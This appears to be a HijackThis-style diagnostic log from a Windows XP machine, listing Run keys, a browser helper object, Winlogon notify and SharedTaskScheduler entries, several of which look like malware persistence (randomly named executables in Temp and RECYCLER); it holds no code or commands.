O2 - BHO: C:\WINDOWS\system32\jsne87fidgf.dll - {C5BF49A2-94F3-42BD-F434-3604812C897D} - C:\WINDOWS\system32\jsne87fidgf.dll (file missing)
O4 - HKLM\..\Run: [rs32net] C:\WINDOWS\System32\rs32net.exe
O4 – HKLM\..\Run: [xsjfn83jkemfofght] C:\DOCUME~1\user899\LOCALS~1\Temp\winlogin.exe
O4 – HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 – HKCU\..\Run: [rs32net] C:\WINDOWS\System32\rs32net.exe
O4 – HKCU\..\Run: [xsjfn83jkemfofght] C:\DOCUME~1\user899\LOCALS~1\Temp\winlogin.exe
O4 – HKCU\..\Run: [Jnskdfmf9eldfd] C:\DOCUME~1\user899\LOCALS~1\Temp\csrssc.exe
O4 – HKCU\..\Run: [gadcom] “C:\Documents and Settings\user899\Application Data\gadcom\gadcom.exe” 61A847B5BBF72813349838466188719AB689201522886B092CBD44BD8689220221DD3257
O4 – HKCU\..\Run: [12CFG94-z641-2SF-N31P-5M1ER6H6L1] C:\RECYCLER\S-1-5-21-3997352701-5278103066-943349985-9760\winigon.exe
O9 – Extra button: Messenger – {FB5F1910-F110-11d2-BB9E-00C04F795683} – C:\Program Files\Messenger\msmsgs.exe
O9 – Extra ‘Tools’ menuitem: Windows Messenger – {FB5F1910-F110-11d2-BB9E-00C04F795683} – C:\Program Files\Messenger\msmsgs.exe
O20 – Winlogon Notify: bdedabafadb – C:\WINDOWS\system32\bdedabafadb.dll
O22 – SharedTaskScheduler: Browseui preloader – {438755C2-A8BA-11D1-B96B-00A0C90312E1} – C:\WINDOWS\system32\browseui.dll
O22 – SharedTaskScheduler: Component Categories cache daemon – {8C7461EF-2B13-11d2-BE35-3078302C2030} – C:\WINDOWS\system32\browseui.dll
O22 – SharedTaskScheduler: mcb7uehuj3n8weuhejsw – {C5BF49A2-94F3-42BD-F434-3604812C897D} – C:\WINDOWS\system32\jsne87fidgf.dll (file missing)

End of Analysis.